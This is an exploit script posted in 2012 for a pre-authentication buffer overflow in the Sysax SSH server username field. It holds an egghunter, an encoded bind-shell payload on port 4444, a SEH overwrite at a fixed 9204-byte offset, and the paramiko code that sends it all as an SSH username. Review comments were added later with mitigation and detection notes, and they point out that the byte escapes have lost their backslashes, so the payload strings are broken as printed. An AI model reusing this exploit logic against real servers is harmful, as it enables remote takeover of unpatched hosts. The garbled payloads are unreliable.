
Sysax 5.53 SSH Username Buffer Overflow Exploit

Posted on 28 February 2012

#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)
#Author: Craig Freyman (@cd1zz)
#OS Tested: XP SP3 32bit, 2003 Server SP2 (No DEP)
#Software Versions Tested: 5.53, 5.52, 5.50
#Date Discovered: Febrary 22, 2012
#Vendor Contacted: Febrary 23, 2012
#Vendor Response: February 27, 2012
#Vendor Fix: Sysax 5.55
#Detailed Exploit Description:http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html
##########################################################################################################
#
# NOTE(review): Python 2 script (print statements). Risk summary for defenders, taken
# from the header and the code below: the vulnerable input is the SSH *username*, sent
# before any credential is checked, and the vendor fix is Sysax 5.55 — upgrading is the
# mitigation. On the wire this looks like an SSH authentication attempt whose username
# is several kilobytes long (see the 9204-byte sizing below); legitimate usernames are
# a few dozen bytes, so username length is a usable detection signal.
#
# NOTE(review): as rendered on this page every "\x.." escape has lost its backslash, so
# the string literals below are plain ASCII text ("x66x81..."), not the byte values the
# original comments refer to. Do not derive byte-pattern signatures from this listing.

import paramiko,os,sys   # `os` is imported but never used below

# Exactly two positional arguments: target host and port.
if len(sys.argv) != 3:
    print "[+] Usage: ./filename <Target IP> <Port>"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

# Stage-1 stub the author labels an egghunter (see title); it is placed after the
# main payload in `buff` below.
egghunter = (
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05"
"x5ax74xefxb8x44x4ex57x50x8bxfaxafx75xeaxaf"
"x75xe7xffxe7")

# msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e -e x86/alpha_mixed X
# The leading "DNWPDNWP" is the tag the egghunter searches for; the author's comment
# above records how the remainder was generated (bind shell on TCP/4444 — an inbound
# listener on that port after an SSH crash is the host-side indicator).
shell = ("DNWPDNWP"
"x89xe0xdaxdfxd9x70xf4x5bx53x59x49x49x49x49"
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51"
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32"
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41"
"x42x75x4ax49x69x6cx68x68x6dx59x77x70x57x70"
"x57x70x33x50x4fx79x39x75x70x31x7ax72x62x44"
"x4cx4bx52x72x70x30x6ex6bx32x72x44x4cx4cx4b"
"x36x32x74x54x6ex6bx71x62x34x68x64x4fx78x37"
"x42x6ax76x46x54x71x39x6fx35x61x49x50x4ex4c"
"x77x4cx61x71x31x6cx66x62x64x6cx75x70x39x51"
"x58x4fx34x4dx66x61x4fx37x6bx52x6cx30x73x62"
"x30x57x4cx4bx36x32x64x50x4cx4bx63x72x77x4c"
"x57x71x7ax70x6ex6bx61x50x72x58x6fx75x79x50"
"x61x64x50x4ax63x31x48x50x30x50x4cx4bx53x78"
"x56x78x6ex6bx50x58x51x30x35x51x59x43x69x73"
"x57x4cx73x79x4cx4bx47x44x6ex6bx47x71x79x46"
"x44x71x4bx4fx35x61x79x50x6cx6cx39x51x5ax6f"
"x76x6dx47x71x78x47x75x68x6bx50x33x45x39x64"
"x64x43x73x4dx4cx38x37x4bx31x6dx45x74x64x35"
"x39x72x32x78x4cx4bx30x58x45x74x47x71x48x53"
"x50x66x4cx4bx36x6cx42x6bx4ex6bx56x38x75x4c"
"x47x71x39x43x4ex6bx56x64x4ex6bx33x31x68x50"
"x6bx39x70x44x76x44x77x54x43x6bx71x4bx35x31"
"x36x39x30x5ax30x51x4bx4fx4dx30x70x58x31x4f"
"x42x7ax4cx4bx55x42x6ax4bx4dx56x63x6dx70x68"
"x50x33x36x52x45x50x67x70x70x68x31x67x31x63"
"x45x62x71x4fx31x44x61x78x52x6cx62x57x51x36"
"x53x37x59x6fx4bx65x6fx48x6ex70x56x61x67x70"
"x77x70x76x49x68x44x43x64x50x50x73x58x45x79"
"x6bx30x32x4bx65x50x49x6fx49x45x62x70x72x70"
"x76x30x70x50x53x70x66x30x67x30x46x30x45x38"
"x48x6ax36x6fx39x4fx59x70x39x6fx78x55x4ex69"
"x49x57x36x51x6bx6bx52x73x50x68x56x62x77x70"
"x66x71x31x4cx4fx79x6bx56x51x7ax36x70x72x76"
"x32x77x65x38x4bx72x6bx6bx64x77x71x77x4bx4f"
"x4ex35x50x53x56x37x73x58x6cx77x38x69x37x48"
"x69x6fx39x6fx78x55x63x63x30x53x31x47x62x48"
"x30x74x78x6cx57x4bx79x71x6bx4fx79x45x76x37"
"x4cx49x6fx37x55x38x73x45x72x4ex50x4dx43x51"
"x39x6fx59x45x73x58x42x43x50x6dx43x54x75x50"
"x4dx59x59x73x70x57x30x57x73x67x36x51x38x76"
"x51x7ax57x62x42x79x36x36x5ax42x6bx4dx31x76"
"x49x57x61x54x47x54x37x4cx67x71x53x31x4cx4d"
"x67x34x77x54x74x50x7ax66x37x70x51x54x52x74"
"x52x70x71x46x70x56x43x66x32x66x50x56x42x6e"
"x50x56x46x36x61x43x43x66x53x58x73x49x58x4c"
"x37x4fx4dx56x4bx4fx78x55x6fx79x69x70x30x4e"
"x50x56x51x56x39x6fx76x50x61x78x63x38x4ex67"
"x67x6dx71x70x59x6fx49x45x6dx6bx68x70x4fx45"
"x4ex42x62x76x72x48x4cx66x4ex75x6dx6dx6dx4d"
"x6bx4fx6ax75x37x4cx63x36x63x4cx45x5ax6fx70"
"x39x6bx39x70x52x55x37x75x6dx6bx63x77x75x43"
"x74x32x72x4fx51x7ax77x70x50x53x69x6fx38x55"
"x41x41")

# Two 50-repetition pads around the egghunter (NOP sleds in the original; here the
# stripped escapes make each one 150 ASCII characters instead of 50 bytes).
padding1 = "x90" * 50
padding2 = "x90" * 50
# SEH overwrite: next-SEH slot then the handler address. The author's note names a
# POP/POP/RET in sysaxservd.exe — i.e. the overwrite lands inside the service's own
# image, so a protection that depends on the handler address (SafeSEH, ASLR on that
# binary) is what would have to break this. Tested only on no-DEP targets per the
# header; whether DEP alone stops it is not established here.
nseh = "x90x90xebx80"
seh = "x69x26x40x00" #00402669 PPR sysaxservd.exe

# Size the filler so that everything before the SEH fields is exactly 9204 characters.
# This fixed offset is the reproducible part of the trigger and the basis for a
# length-based detection rule. With the escapes stripped, len() of the literals differs
# from the original byte counts, so `junk` here is shorter than the author intended.
junk = "A" * (9204 - len(egghunter + padding1 + padding2 + shell))

# Final username: filler, tagged payload, pad, egghunter, pad, then the SEH overwrite.
buff = junk + shell + padding1 + egghunter + padding2 + nseh + seh

print "============================================================================"
print " Sysax <= 5.53 SSH Username BoF Pre Auth RCE "
print " by cd1zz "
print " www.pwnag3.com "
print "============================================================================"

# Connectivity probe. Bare `except:` swallows every exception type, including
# KeyboardInterrupt, and reports them all as a connection failure.
try:
    transport = paramiko.Transport((host, port))
except:
    print "[X] Unable to connect to " + host + " on port " + str(port)
    sys.exit(1)

# A second Transport is opened and the first is simply dropped (never closed), so the
# target sees two TCP connections from this script.
transport = paramiko.Transport((host, port))
print "[+] Launching exploit against " + host + " on port " + str(port)
print "[+] Done!"
# The oversized buffer is passed as the SSH username; the password value is irrelevant
# because the overflow occurs before authentication is evaluated (per the title).
# "[+] Done!" is printed before this call, so it says nothing about the outcome.
transport.connect(username = buff, password = "pwnag3")
transport.close()

 
